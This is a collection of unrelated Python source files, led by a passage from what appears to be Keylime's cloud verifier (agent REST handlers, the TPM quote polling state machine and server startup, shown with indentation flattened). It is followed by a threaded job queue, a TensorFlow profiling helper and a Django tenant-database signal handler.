if verifier_id != agent.verifier_id:
web_util.echo_json_response(self, 404, "agent id associated to this verifier")
logger.info("DELETE returning 404 response. agent id: %s not associated to this verifer.", agent_id)
return
op_state = agent.operational_state
if op_state in (states.SAVED, states.FAILED, states.TERMINATED, states.TENANT_FAILED, states.INVALID_QUOTE):
try:
verifier_db_delete_agent(session, agent_id)
except SQLAlchemyError as e:
logger.error("SQLAlchemy Error: %s", e)
web_util.echo_json_response(self, 200, "Success")
logger.info("DELETE returning 200 response for agent id: %s", agent_id)
else:
try:
update_agent = session.query(VerfierMain).get(agent_id)
update_agent.operational_state = states.TERMINATED
try:
session.add(update_agent)
except SQLAlchemyError as e:
logger.error("SQLAlchemy Error: %s", e)
session.commit()
web_util.echo_json_response(self, 202, "Accepted")
logger.info("DELETE returning 202 response for agent id: %s", agent_id)
except SQLAlchemyError as e:
logger.error("SQLAlchemy Error: %s", e)
def post(self):
"""This method handles the POST requests to add agents to the Cloud Verifier.
Currently, only agents resources are available for POSTing, i.e. /agents. All other POST uri's will return errors.
agents requests require a json block sent in the body
"""
session = get_session()
try:
rest_params = web_util.get_restful_params(self.request.uri)
if rest_params is None:
web_util.echo_json_response(self, 405, "Not Implemented: Use /agents/ interface")
return
if not web_util.validate_api_version(self, rest_params["api_version"], logger):
return
if "agents" not in rest_params:
web_util.echo_json_response(self, 400, "uri not supported")
logger.warning("POST returning 400 response. uri not supported: %s", self.request.path)
return
agent_id = rest_params["agents"]
if agent_id is not None:
# If the agent ID is not valid (wrong set of
# characters), just do nothing.
if not validators.valid_agent_id(agent_id):
web_util.echo_json_response(self, 400, "agent_id not not valid")
logger.error("POST received an invalid agent ID: %s", agent_id)
return
content_length = len(self.request.body)
if content_length == 0:
web_util.echo_json_response(self, 400, "Expected non zero content length")
logger.warning("POST returning 400 response. Expected non zero content length.")
else:
json_body = json.loads(self.request.body)
agent_data = {}
agent_data["v"] = json_body["v"]
agent_data["ip"] = json_body["cloudagent_ip"]
agent_data["port"] = int(json_body["cloudagent_port"])
agent_data["operational_state"] = states.START
agent_data["public_key"] = ""
agent_data["tpm_policy"] = json_body["tpm_policy"]
agent_data["meta_data"] = json_body["metadata"]
agent_data["allowlist"] = json_body["allowlist"]
agent_data["mb_refstate"] = json_body["mb_refstate"]
agent_data["ima_sign_verification_keys"] = json_body["ima_sign_verification_keys"]
agent_data["revocation_key"] = json_body["revocation_key"]
agent_data["accept_tpm_hash_algs"] = json_body["accept_tpm_hash_algs"]
agent_data["accept_tpm_encryption_algs"] = json_body["accept_tpm_encryption_algs"]
agent_data["accept_tpm_signing_algs"] = json_body["accept_tpm_signing_algs"]
agent_data["supported_version"] = json_body["supported_version"]
agent_data["ak_tpm"] = json_body["ak_tpm"]
agent_data["mtls_cert"] = json_body.get("mtls_cert", None)
agent_data["hash_alg"] = ""
agent_data["enc_alg"] = ""
agent_data["sign_alg"] = ""
agent_data["agent_id"] = agent_id
agent_data["boottime"] = 0
agent_data["ima_pcrs"] = []
agent_data["pcr10"] = None
agent_data["next_ima_ml_entry"] = 0
agent_data["learned_ima_keyrings"] = {}
agent_data["verifier_id"] = config.get(
"cloud_verifier", "cloudverifier_id", fallback=cloud_verifier_common.DEFAULT_VERIFIER_ID
)
agent_data["verifier_ip"] = config.get("cloud_verifier", "cloudverifier_ip")
agent_data["verifier_port"] = config.get("cloud_verifier", "cloudverifier_port")
# TODO: Always error for v1.0 version after initial upgrade
if agent_data["mtls_cert"] is None and agent_data["supported_version"] != "1.0":
web_util.echo_json_response(self, 400, "mTLS certificate for agent is required!")
return
is_valid, err_msg = cloud_verifier_common.validate_agent_data(agent_data)
if not is_valid:
web_util.echo_json_response(self, 400, err_msg)
logger.warning(err_msg)
return
try:
new_agent_count = session.query(VerfierMain).filter_by(agent_id=agent_id).count()
except SQLAlchemyError as e:
logger.error("SQLAlchemy Error: %s", e)
raise e
# don't allow overwriting
if new_agent_count > 0:
web_util.echo_json_response(self, 409, f"Agent of uuid {agent_id} already exists")
logger.warning("Agent of uuid %s already exists", agent_id)
else:
try:
# Add the agent and data
session.add(VerfierMain(**agent_data))
session.commit()
except SQLAlchemyError as e:
logger.error("SQLAlchemy Error: %s", e)
raise e
# add default fields that are ephemeral
for key, val in exclude_db.items():
agent_data[key] = val
# Prepare SSLContext for mTLS connections
agent_mtls_cert_enabled = config.getboolean(
"cloud_verifier", "agent_mtls_cert_enabled", fallback=False
)
mtls_cert = agent_data["mtls_cert"]
agent_data["ssl_context"] = None
if agent_mtls_cert_enabled and mtls_cert:
agent_data["ssl_context"] = web_util.generate_agent_mtls_context(
mtls_cert, self.mtls_options
)
if agent_data["ssl_context"] is None:
logger.warning("Connecting to agent without mTLS: %s", agent_id)
asyncio.ensure_future(process_agent(agent_data, states.GET_QUOTE))
web_util.echo_json_response(self, 200, "Success")
logger.info("POST returning 200 response for adding agent id: %s", agent_id)
else:
web_util.echo_json_response(self, 400, "uri not supported")
logger.warning("POST returning 400 response. uri not supported")
except Exception as e:
web_util.echo_json_response(self, 400, f"Exception error: {str(e)}")
logger.warning("POST returning 400 response. Exception error: %s", e)
logger.exception(e)
def put(self):
"""This method handles the PUT requests to add agents to the Cloud Verifier.
Currently, only agents resources are available for PUTing, i.e. /agents. All other PUT uri's will return errors.
agents requests require a json block sent in the body
"""
session = get_session()
try:
rest_params = web_util.get_restful_params(self.request.uri)
if rest_params is None:
web_util.echo_json_response(self, 405, "Not Implemented: Use /agents/ interface")
return
if not web_util.validate_api_version(self, rest_params["api_version"], logger):
return
if "agents" not in rest_params:
web_util.echo_json_response(self, 400, "uri not supported")
logger.warning("PUT returning 400 response. uri not supported: %s", self.request.path)
return
agent_id = rest_params["agents"]
if agent_id is None:
web_util.echo_json_response(self, 400, "uri not supported")
logger.warning("PUT returning 400 response. uri not supported")
return
# If the agent ID is not valid (wrong set of characters),
# just do nothing.
if not validators.valid_agent_id(agent_id):
web_util.echo_json_response(self, 400, "agent_id not not valid")
logger.error("PUT received an invalid agent ID: %s", agent_id)
return
try:
verifier_id = config.get(
"cloud_verifier", "cloudverifier_id", fallback=cloud_verifier_common.DEFAULT_VERIFIER_ID
)
agent = session.query(VerfierMain).filter_by(agent_id=agent_id, verifier_id=verifier_id).one()
except SQLAlchemyError as e:
logger.error("SQLAlchemy Error: %s", e)
raise e
if agent is None:
web_util.echo_json_response(self, 404, "agent id not found")
logger.info("PUT returning 404 response. agent id: %s not found.", agent_id)
return
if "reactivate" in rest_params:
if not isinstance(agent, dict):
agent = _from_db_obj(agent)
if agent["mtls_cert"]:
agent["ssl_context"] = web_util.generate_agent_mtls_context(agent["mtls_cert"], self.mtls_options)
agent["operational_state"] = states.START
asyncio.ensure_future(process_agent(agent, states.GET_QUOTE))
web_util.echo_json_response(self, 200, "Success")
logger.info("PUT returning 200 response for agent id: %s", agent_id)
elif "stop" in rest_params:
# do stuff for terminate
logger.debug("Stopping polling on %s", agent_id)
try:
session.query(VerfierMain).filter(VerfierMain.agent_id == agent_id).update(
{"operational_state": states.TENANT_FAILED}
)
session.commit()
except SQLAlchemyError as e:
logger.error("SQLAlchemy Error: %s", e)
web_util.echo_json_response(self, 200, "Success")
logger.info("PUT returning 200 response for agent id: %s", agent_id)
else:
web_util.echo_json_response(self, 400, "uri not supported")
logger.warning("PUT returning 400 response. uri not supported")
except Exception as e:
web_util.echo_json_response(self, 400, f"Exception error: {str(e)}")
logger.warning("PUT returning 400 response. Exception error: %s", e)
logger.exception(e)
def data_received(self, chunk):
raise NotImplementedError()
class AllowlistHandler(BaseHandler):
def head(self):
web_util.echo_json_response(self, 400, "Allowlist handler: HEAD Not Implemented")
def get(self):
"""Get an allowlist
GET /allowlists/{name}
"""
rest_params = web_util.get_restful_params(self.request.uri)
if rest_params is None or "allowlists" not in rest_params:
web_util.echo_json_response(self, 400, "Invalid URL")
return
if not web_util.validate_api_version(self, rest_params["api_version"], logger):
return
allowlist_name = rest_params["allowlists"]
if allowlist_name is None:
web_util.echo_json_response(self, 400, "Invalid URL")
logger.warning("GET returning 400 response: %s", self.request.path)
return
session = get_session()
try:
allowlist = session.query(VerifierAllowlist).filter_by(name=allowlist_name).one()
except NoResultFound:
web_util.echo_json_response(self, 404, f"Allowlist {allowlist_name} not found")
return
except SQLAlchemyError as e:
logger.error("SQLAlchemy Error: %s", e)
web_util.echo_json_response(self, 500, "Failed to get allowlist")
raise
response = {}
for field in ("name", "tpm_policy", "ima_policy"):
response[field] = getattr(allowlist, field, None)
web_util.echo_json_response(self, 200, "Success", response)
def delete(self):
"""Delete an allowlist
DELETE /allowlists/{name}
"""
rest_params = web_util.get_restful_params(self.request.uri)
if rest_params is None or "allowlists" not in rest_params:
web_util.echo_json_response(self, 400, "Invalid URL")
return
if not web_util.validate_api_version(self, rest_params["api_version"], logger):
return
allowlist_name = rest_params["allowlists"]
if allowlist_name is None:
web_util.echo_json_response(self, 400, "Invalid URL")
logger.warning("DELETE returning 400 response: %s", self.request.path)
return
session = get_session()
try:
session.query(VerifierAllowlist).filter_by(name=allowlist_name).one()
except NoResultFound:
web_util.echo_json_response(self, 404, f"Allowlist {allowlist_name} not found")
return
except SQLAlchemyError as e:
logger.error("SQLAlchemy Error: %s", e)
web_util.echo_json_response(self, 500, "Failed to get allowlist")
raise
try:
session.query(VerifierAllowlist).filter_by(name=allowlist_name).delete()
session.commit()
except SQLAlchemyError as e:
logger.error("SQLAlchemy Error: %s", e)
web_util.echo_json_response(self, 500, "Failed to get allowlist")
raise
# NOTE(kaifeng) 204 Can not have response body, but current helper
# doesn't support this case.
self.set_status(204)
self.set_header("Content-Type", "application/json")
self.finish()
logger.info("DELETE returning 204 response for allowlist: %s", allowlist_name)
def post(self):
"""Create an allowlist
POST /allowlists/{name}
body: {"tpm_policy": {..} ...
"""
rest_params = web_util.get_restful_params(self.request.uri)
if rest_params is None or "allowlists" not in rest_params:
web_util.echo_json_response(self, 400, "Invalid URL")
return
if not web_util.validate_api_version(self, rest_params["api_version"], logger):
return
allowlist_name = rest_params["allowlists"]
if allowlist_name is None:
web_util.echo_json_response(self, 400, "Invalid URL")
return
content_length = len(self.request.body)
if content_length == 0:
web_util.echo_json_response(self, 400, "Expected non zero content length")
logger.warning("POST returning 400 response. Expected non zero content length.")
return
allowlist = {}
json_body = json.loads(self.request.body)
allowlist["name"] = allowlist_name
tpm_policy = json_body.get("tpm_policy")
if tpm_policy:
allowlist["tpm_policy"] = tpm_policy
ima_policy = json_body.get("ima_policy")
if ima_policy:
allowlist["ima_policy"] = ima_policy
session = get_session()
# don't allow overwriting
try:
al_count = session.query(VerifierAllowlist).filter_by(name=allowlist_name).count()
if al_count > 0:
web_util.echo_json_response(self, 409, f"Allowlist with name {allowlist_name} already exists")
logger.warning("Allowlist with name %s already exists", allowlist_name)
return
except SQLAlchemyError as e:
logger.error("SQLAlchemy Error: %s", e)
raise
try:
# Add the allowlist and its data
session.add(VerifierAllowlist(**allowlist))
session.commit()
except SQLAlchemyError as e:
logger.error("SQLAlchemy Error: %s", e)
raise
web_util.echo_json_response(self, 201)
logger.info("POST returning 201")
def put(self):
web_util.echo_json_response(self, 400, "Allowlist handler: PUT Not Implemented")
def data_received(self, chunk):
raise NotImplementedError()
async def invoke_get_quote(agent, need_pubkey):
failure = Failure(Component.INTERNAL, ["verifier"])
if agent is None:
raise Exception("agent deleted while being processed")
params = cloud_verifier_common.prepare_get_quote(agent)
partial_req = "1"
if need_pubkey:
partial_req = "0"
# TODO: remove special handling after initial upgrade
if agent["ssl_context"]:
res = tornado_requests.request(
"GET",
f"https://{agent['ip']}:{agent['port']}/v{agent['supported_version']}/quotes/integrity"
f"?nonce={params['nonce']}&mask={params['mask']}"
f"&partial={partial_req}&ima_ml_entry={params['ima_ml_entry']}",
context=agent["ssl_context"],
)
else:
res = tornado_requests.request(
"GET",
f"http://{agent['ip']}:{agent['port']}/v{agent['supported_version']}/quotes/integrity"
f"?nonce={params['nonce']}&mask={params['mask']}"
f"&partial={partial_req}&ima_ml_entry={params['ima_ml_entry']}",
)
response = await res
if response.status_code != 200:
# this is a connection error, retry get quote
if response.status_code in [500, 599]:
asyncio.ensure_future(process_agent(agent, states.GET_QUOTE_RETRY))
else:
# catastrophic error, do not continue
logger.critical(
"Unexpected Get Quote response error for cloud agent %s, Error: %s",
agent["agent_id"],
response.status_code,
)
failure.add_event("no_quote", "Unexpected Get Quote reponse from agent", False)
asyncio.ensure_future(process_agent(agent, states.FAILED, failure))
else:
try:
json_response = json.loads(response.body)
# validate the cloud agent response
if "provide_V" not in agent:
agent["provide_V"] = True
agentAttestState = get_AgentAttestStates().get_by_agent_id(agent["agent_id"])
failure = cloud_verifier_common.process_quote_response(agent, json_response["results"], agentAttestState)
if not failure:
if agent["provide_V"]:
asyncio.ensure_future(process_agent(agent, states.PROVIDE_V))
else:
asyncio.ensure_future(process_agent(agent, states.GET_QUOTE))
else:
asyncio.ensure_future(process_agent(agent, states.INVALID_QUOTE, failure))
# store the attestation state
store_attestation_state(agentAttestState)
except Exception as e:
logger.exception(e)
failure.add_event(
"exception", {"context": "Agent caused the verifier to throw an exception", "data": str(e)}, False
)
asyncio.ensure_future(process_agent(agent, states.FAILED, failure))
async def invoke_provide_v(agent):
failure = Failure(Component.INTERNAL, ["verifier"])
if agent is None:
raise Exception("Agent deleted while being processed")
try:
if agent["pending_event"] is not None:
agent["pending_event"] = None
except KeyError:
pass
v_json_message = cloud_verifier_common.prepare_v(agent)
# TODO: remove special handling after initial upgrade
if agent["ssl_context"]:
res = tornado_requests.request(
"POST",
f"https://{agent['ip']}:{agent['port']}/v{agent['supported_version']}/keys/vkey",
data=v_json_message,
context=agent["ssl_context"],
)
else:
res = tornado_requests.request(
"POST", f"http://{agent['ip']}:{agent['port']}/v{agent['supported_version']}/keys/vkey", data=v_json_message
)
response = await res
if response.status_code != 200:
if response.status_code in [500, 599]:
asyncio.ensure_future(process_agent(agent, states.PROVIDE_V_RETRY))
else:
# catastrophic error, do not continue
logger.critical(
"Unexpected Provide V response error for cloud agent %s, Error: %s",
agent["agent_id"],
response.status_code,
)
failure.add_event("no_v", {"message": "Unexpected provide V response", "data": response.status_code}, False)
asyncio.ensure_future(process_agent(agent, states.FAILED, failure))
else:
asyncio.ensure_future(process_agent(agent, states.GET_QUOTE))
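# process_agent() below drives the per-agent state machine. A rough summary of the
# transitions implemented by its branches (derived from this code, not a spec):
#   START -> GET_QUOTE                   first quote request after the agent is added
#   GET_QUOTE -> PROVIDE_V               quote verified and provide_V set; deliver the V key
#   PROVIDE_V / GET_QUOTE -> GET_QUOTE   periodic re-quoting, optionally delayed by quote_interval
#   GET_QUOTE -> GET_QUOTE_RETRY         connection error, retried up to max_retries
#   PROVIDE_V -> PROVIDE_V_RETRY         connection error, retried up to max_retries
#   any -> FAILED / INVALID_QUOTE        failures are persisted; irrecoverable ones stop polling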
async def process_agent(agent, new_operational_state, failure=Failure(Component.INTERNAL, ["verifier"])):
# Convert to dict if the agent arg is a db object
if not isinstance(agent, dict):
agent = _from_db_obj(agent)
session = get_session()
try: # pylint: disable=R1702
main_agent_operational_state = agent["operational_state"]
try:
stored_agent = session.query(VerfierMain).filter_by(agent_id=str(agent["agent_id"])).first()
except SQLAlchemyError as e:
logger.error("SQLAlchemy Error: %s", e)
# if the user terminated this agent
if stored_agent.operational_state == states.TERMINATED:
logger.warning("Agent %s terminated by user.", agent["agent_id"])
if agent["pending_event"] is not None:
tornado.ioloop.IOLoop.current().remove_timeout(agent["pending_event"])
verifier_db_delete_agent(session, agent["agent_id"])
return
# if the user tells us to stop polling because the tenant quote check failed
if stored_agent.operational_state == states.TENANT_FAILED:
logger.warning("Agent %s has failed tenant quote. Stopping polling", agent["agent_id"])
if agent["pending_event"] is not None:
tornado.ioloop.IOLoop.current().remove_timeout(agent["pending_event"])
return
# If failed during processing, log regardless and drop it on the floor
# The administration application (tenant) can GET the status and act accordingly (delete/retry/etc).
if new_operational_state in (states.FAILED, states.INVALID_QUOTE):
assert failure, "States FAILED and INVALID QUOTE should only be reached with a failure message"
if agent.get("severity_level") is None or agent["severity_level"] < failure.highest_severity.severity:
agent["severity_level"] = failure.highest_severity.severity
agent["last_event_id"] = failure.highest_severity_event.event_id
agent["operational_state"] = new_operational_state
# issue notification for invalid quotes
if new_operational_state == states.INVALID_QUOTE:
cloud_verifier_common.notify_error(agent, event=failure.highest_severity_event)
# When the failure is irrecoverable we stop polling the agent
if not failure.recoverable or failure.highest_severity == MAX_SEVERITY_LABEL:
if agent["pending_event"] is not None:
tornado.ioloop.IOLoop.current().remove_timeout(agent["pending_event"])
for key in exclude_db:
if key in agent:
del agent[key]
session.query(VerfierMain).filter_by(agent_id=agent["agent_id"]).update(agent)
session.commit()
# propagate all state, but remove non-DB keys first (using exclude_db)
try:
agent_db = dict(agent)
for key in exclude_db:
if key in agent_db:
del agent_db[key]
session.query(VerfierMain).filter_by(agent_id=agent_db["agent_id"]).update(agent_db)
session.commit()
except SQLAlchemyError as e:
logger.error("SQLAlchemy Error: %s", e)
# If agent was in a failed state we check if we either stop polling
# or just add it again to the event loop
if new_operational_state in [states.FAILED, states.INVALID_QUOTE]:
if not failure.recoverable or failure.highest_severity == MAX_SEVERITY_LABEL:
logger.warning("Agent %s failed, stopping polling", agent["agent_id"])
return
await invoke_get_quote(agent, False)
return
# if new, get a quote
if main_agent_operational_state == states.START and new_operational_state == states.GET_QUOTE:
agent["num_retries"] = 0
agent["operational_state"] = states.GET_QUOTE
await invoke_get_quote(agent, True)
return
if main_agent_operational_state == states.GET_QUOTE and new_operational_state == states.PROVIDE_V:
agent["num_retries"] = 0
agent["operational_state"] = states.PROVIDE_V
await invoke_provide_v(agent)
return
if (
main_agent_operational_state in (states.PROVIDE_V, states.GET_QUOTE)
and new_operational_state == states.GET_QUOTE
):
agent["num_retries"] = 0
interval = config.getfloat("cloud_verifier", "quote_interval")
agent["operational_state"] = states.GET_QUOTE
if interval == 0:
await invoke_get_quote(agent, False)
else:
logger.debug("Setting up callback to check again in %f seconds", interval)
# set up a call back to check again
cb = functools.partial(invoke_get_quote, agent, False)
pending = tornado.ioloop.IOLoop.current().call_later(interval, cb)
agent["pending_event"] = pending
return
maxr = config.getint("cloud_verifier", "max_retries")
interval = config.getfloat("cloud_verifier", "retry_interval")
exponential_backoff = config.getboolean("cloud_verifier", "exponential_backoff")
if main_agent_operational_state == states.GET_QUOTE and new_operational_state == states.GET_QUOTE_RETRY:
if agent["num_retries"] >= maxr:
logger.warning(
"Agent %s was not reachable for quote in %d tries, setting state to FAILED", agent["agent_id"], maxr
)
failure.add_event("not_reachable", "agent was not reachable from verifier", False)
if agent["first_verified"]: # only notify on previously good agents
cloud_verifier_common.notify_error(
agent, msgtype="comm_error", event=failure.highest_severity_event
)
else:
logger.debug("Communication error for new agent. No notification will be sent")
await process_agent(agent, states.FAILED, failure)
else:
agent["operational_state"] = states.GET_QUOTE
cb = functools.partial(invoke_get_quote, agent, True)
agent["num_retries"] += 1
next_retry = retry.retry_time(exponential_backoff, interval, agent["num_retries"], logger)
logger.info(
"Connection to %s refused after %d/%d tries, trying again in %f seconds",
agent["ip"],
agent["num_retries"],
maxr,
next_retry,
)
tornado.ioloop.IOLoop.current().call_later(next_retry, cb)
return
if main_agent_operational_state == states.PROVIDE_V and new_operational_state == states.PROVIDE_V_RETRY:
if agent["num_retries"] >= maxr:
logger.warning(
"Agent %s was not reachable to provide v in %d tries, setting state to FAILED",
agent["agent_id"],
maxr,
)
failure.add_event("not_reachable_v", "agent was not reachable to provide V", False)
cloud_verifier_common.notify_error(agent, msgtype="comm_error", event=failure.highest_severity_event)
await process_agent(agent, states.FAILED, failure)
else:
agent["operational_state"] = states.PROVIDE_V
cb = functools.partial(invoke_provide_v, agent)
agent["num_retries"] += 1
next_retry = retry.retry_time(exponential_backoff, interval, agent["num_retries"], logger)
logger.info(
"Connection to %s refused after %d/%d tries, trying again in %f seconds",
agent["ip"],
agent["num_retries"],
maxr,
next_retry,
)
tornado.ioloop.IOLoop.current().call_later(next_retry, cb)
return
raise Exception("nothing should ever fall out of this!")
except Exception as e:
logger.error("Polling thread error: %s", e)
logger.exception(e)
failure.add_event(
"exception", {"context": "Agent caused the verifier to throw an exception", "data": str(e)}, False
)
await process_agent(agent, states.FAILED, failure)
async def activate_agents(verifier_id, verifier_ip, verifier_port, mtls_options):
session = get_session()
aas = get_AgentAttestStates()
try:
agents = session.query(VerfierMain).filter_by(verifier_id=verifier_id).all()
for agent in agents:
agent.verifier_ip = verifier_ip
agent.verifier_port = verifier_port
agent_run = _from_db_obj(agent)
if agent_run["mtls_cert"]:
agent_run["ssl_context"] = web_util.generate_agent_mtls_context(agent_run["mtls_cert"], mtls_options)
if agent.operational_state == states.START:
asyncio.ensure_future(process_agent(agent_run, states.GET_QUOTE))
if agent.boottime:
ima_pcrs_dict = {}
for pcr_num in agent.ima_pcrs:
ima_pcrs_dict[pcr_num] = getattr(agent, f"pcr{pcr_num}")
aas.add(
agent.agent_id, agent.boottime, ima_pcrs_dict, agent.next_ima_ml_entry, agent.learned_ima_keyrings
)
session.commit()
except SQLAlchemyError as e:
logger.error("SQLAlchemy Error: %s", e)
def main():
"""Main method of the Cloud Verifier Server. This method is encapsulated in a function for packaging to allow it to be
called as a function by an external program."""
cloudverifier_port = config.get("cloud_verifier", "cloudverifier_port")
cloudverifier_host = config.get("cloud_verifier", "cloudverifier_ip")
cloudverifier_id = config.get(
"cloud_verifier", "cloudverifier_id", fallback=cloud_verifier_common.DEFAULT_VERIFIER_ID
)
# Check if measured boot was configured correctly
if policies.get_policy(config.MEASUREDBOOT_POLICYNAME) is None:
logger.error('Measured boot policy "%s" could not be found!', config.MEASUREDBOOT_POLICYNAME)
raise Exception(f'Measured boot policy "{config.MEASUREDBOOT_POLICYNAME}" could not be found!')
# allow tornado's max upload size to be configurable
max_upload_size = None
if config.has_option("cloud_verifier", "max_upload_size"):
max_upload_size = int(config.get("cloud_verifier", "max_upload_size"))
# set a conservative general umask
os.umask(0o077)
VerfierMain.metadata.create_all(engine, checkfirst=True)
session = get_session()
try:
query_all = session.query(VerfierMain).all()
for row in query_all:
if row.operational_state in states.APPROVED_REACTIVATE_STATES:
row.operational_state = states.START
session.commit()
except SQLAlchemyError as e:
logger.error("SQLAlchemy Error: %s", e)
num = session.query(VerfierMain.agent_id).count()
if num > 0:
agent_ids = session.query(VerfierMain.agent_id).all()
logger.info("Agent ids in db loaded from file: %s", agent_ids)
logger.info("Starting Cloud Verifier (tornado) on port %s, use <Ctrl-C> to stop", cloudverifier_port)
# print out API versions we support
keylime_api_version.log_api_versions(logger)
context, mtls_options = web_util.init_mtls(logger=logger)
# Check for user defined CA to connect to agent
agent_mtls_cert = config.get("cloud_verifier", "agent_mtls_cert", fallback=None)
agent_mtls_private_key = config.get("cloud_verifier", "agent_mtls_private_key", fallback=None)
agent_mtls_private_key_pw = config.get("cloud_verifier", "agent_mtls_private_key_pw", fallback=None)
# Only set custom options if the cert should not be the same as used by the verifier
if agent_mtls_cert != "CV":
mtls_options = (agent_mtls_cert, agent_mtls_private_key, agent_mtls_private_key_pw)
app = tornado.web.Application(
[
(r"/v?[0-9]+(?:\.[0-9]+)?/agents/.*", AgentsHandler, {"mtls_options": mtls_options}),
(r"/v?[0-9]+(?:\.[0-9]+)?/allowlists/.*", AllowlistHandler),
(r"/versions?", VersionHandler),
(r".*", MainHandler),
]
)
sockets = tornado.netutil.bind_sockets(int(cloudverifier_port), address=cloudverifier_host)
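    # The listening sockets are bound once here in the parent so that every worker
    # process started below can accept connections on the same port (pre-fork model).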
def server_process(task_id):
logger.info("Starting server of process %s", task_id)
engine.dispose()
server = tornado.httpserver.HTTPServer(app, ssl_options=context, max_buffer_size=max_upload_size)
server.add_sockets(sockets)
def server_sig_handler(*_):
logger.info("Shutting down server %s..", task_id)
# Stop server to not accept new incoming connections
server.stop()
# Wait for all connections to be closed and then stop ioloop
async def stop():
await server.close_all_connections()
tornado.ioloop.IOLoop.current().stop()
asyncio.ensure_future(stop())
# Attach signal handler to ioloop.
# Do not use signal.signal(..) for that because it does not work!
loop = asyncio.get_event_loop()
loop.add_signal_handler(signal.SIGINT, server_sig_handler)
loop.add_signal_handler(signal.SIGTERM, server_sig_handler)
server.start()
if task_id == 0:
# Reactivate agents
asyncio.ensure_future(
activate_agents(cloudverifier_id, cloudverifier_host, cloudverifier_port, mtls_options)
)
tornado.ioloop.IOLoop.current().start()
logger.debug("Server %s stopped.", task_id)
sys.exit(0)
processes = []
def sig_handler(*_):
if config.getboolean("cloud_verifier", "revocation_notifier"):
revocation_notifier.stop_broker()
for p in processes:
p.join()
sys.exit(0)
signal.signal(signal.SIGINT, sig_handler)
signal.signal(signal.SIGTERM, sig_handler)
if config.getboolean("cloud_verifier", "revocation_notifier"):
logger.info(
"Starting service for revocation notifications on port %s",
config.getint("cloud_verifier", "revocation_notifier_port"),
)
revocation_notifier.start_broker()
num_workers = config.getint("cloud_verifier", "multiprocessing_pool_num_workers")
if num_workers <= 0:
num_workers = tornado.process.cpu_count()
for task_id in range(0, num_workers):
process = Process(target=server_process, args=(task_id,))
process.start()
processes.append(process)
|
job.py
|
import logging
import traceback
from queue import Queue
from threading import Thread
class RetryException(Exception):
    # Number of times an item raising this exception is re-queued before the error is recorded.
    retry_count = 1
class ItemWrapper:
def __init__(self, item):
self.item = item
class Job:
    def __init__(self, numThreads, iterable=(), func=None, raiseException=False):
self.numThreads = numThreads
self.queue = Queue()
self.exception = None
self.results = []
self.func = func
self.enqueue(iterable)
self.raiseException = raiseException
def enqueue(self, iterable):
for item in iterable:
self.add(item)
def add(self, item):
self.queue.put(item)
def worker(self):
while not self.queue.empty():
item = self.queue.get()
func = item if not isinstance(item, ItemWrapper) else item.item
try:
if func:
ret = func() if not self.func else self.func(func)
                    if isinstance(ret, list):
                        self.results.extend(ret)
                    else:
                        self.results.append(ret)
except Exception as e:
if isinstance(e, RetryException) and not isinstance(item, ItemWrapper):
if e.retry_count > 0:
e.retry_count -= 1
self.add(ItemWrapper(func))
logging.info("Retry: '%s'; Readding item into queue", e)
continue
self.exception = e
logging.error(e)
traceback.print_exc()
finally:
self.queue.task_done()
def run(self):
logging.info("Using %s threads for ~%d items", self.numThreads, self.queue.qsize())
if self.numThreads:
for i in range(self.numThreads):
Thread(target=self.worker, daemon=True).start()
self.queue.join()
else:
self.worker()
if self.exception:
logging.error("Error occurred: %s", self.exception)
if self.raiseException:
raise self.exception
return self.results
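# Illustrative usage sketch (not part of the original module; names below are made up):
# run a handful of callables on a small thread pool. An item that raises RetryException
# is re-queued once via ItemWrapper before the error is recorded on the Job.
if __name__ == "__main__":
    logging.basicConfig(level=logging.INFO)

    def greet():
        return "hello"

    def flaky():
        # The first attempt is re-queued; the retried attempt records the exception.
        raise RetryException("transient failure")

    results = Job(numThreads=2, iterable=[greet, greet, flaky]).run()
    logging.info("Collected results: %s", results)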
|
_profiling.py
|
import json
import os
import threading
import tensorflow as tf
from tensorflow.python.client import timeline
class Timeliner:
    _timeline_dict = None
    options = tf.RunOptions(trace_level=tf.RunOptions.FULL_TRACE)
    run_metadata = tf.RunMetadata()
def update_timeline(self, chrome_trace):
# convert chrome trace to python dict
chrome_trace_dict = json.loads(chrome_trace)
# for first run store full trace
if self._timeline_dict is None:
self._timeline_dict = chrome_trace_dict
# for other - update only time consumption, not definitions
else:
for event in chrome_trace_dict['traceEvents']:
# events time consumption started with 'ts' prefix
if 'ts' in event:
self._timeline_dict['traceEvents'].append(event)
def save(self, f_name):
        os.makedirs(os.path.dirname(f_name), exist_ok=True)
with open(f_name, 'w') as f:
json.dump(self._timeline_dict, f)
def add_run(self, run_metadata=None):
if run_metadata is None:
run_metadata = self.run_metadata
fetched_timeline = timeline.Timeline(run_metadata.step_stats)
chrome_trace = fetched_timeline.generate_chrome_trace_format()
self.update_timeline(chrome_trace)
def launch_tensorboard(log_dir, same_process=False, port=6006):
if port is None:
port = 6006
if same_process:
from tensorboard import main as tb
tf.flags.FLAGS.logdir = log_dir
tf.flags.FLAGS.reload_interval = 1
tf.flags.FLAGS.port = port
threading.Thread(target=tb.main).start()
else:
def run_tb():
os.system('tensorboard --logdir=%s --port=%d' % (log_dir,port))
threading.Thread(target=run_tb).start()
try:
import phi.local.hostname
host = phi.local.hostname.hostname
except (ImportError, AttributeError):
host = 'localhost' # socket.gethostname()
url = "http://%s:%d/" % (host,port)
return url
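# Illustrative usage sketch (assumes the TensorFlow 1.x graph/session API; the output
# path is hypothetical): feed the Timeliner's RunOptions/RunMetadata into Session.run,
# record each step, then save the merged Chrome trace for inspection in chrome://tracing.
if __name__ == "__main__":
    timeliner = Timeliner()
    x = tf.random_normal([256, 256])
    y = tf.matmul(x, x)
    with tf.Session() as sess:
        for _ in range(3):
            sess.run(y, options=timeliner.options, run_metadata=timeliner.run_metadata)
            timeliner.add_run()
    timeliner.save('profiles/timeline.json')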
|
signal.py
|
from threading import Thread
from multi_tenant.tenant.models import Tenant, GlobalUser
from django.db.models.signals import post_save  # another commonly used built-in signal
import logging
from django.dispatch import receiver
from multi_tenant.tenant import get_tenant_model, get_tenant_user_model
Tenant = get_tenant_model()
logger = logging.getLogger('django.request')
@receiver(post_save, sender=Tenant)
def create_data_handler(sender, signal, instance, created, **kwargs):
if created:
try:
instance.create_database()
            logger.info(f'Created database [{instance.db_name}] successfully for {instance.code}')
thread = Thread(target=migrate,args=[instance.code])
thread.start()
except Exception as e:
logger.error(e)
instance.delete(force=True)
def migrate(database: str):
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
logger.error('migrate fail')
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
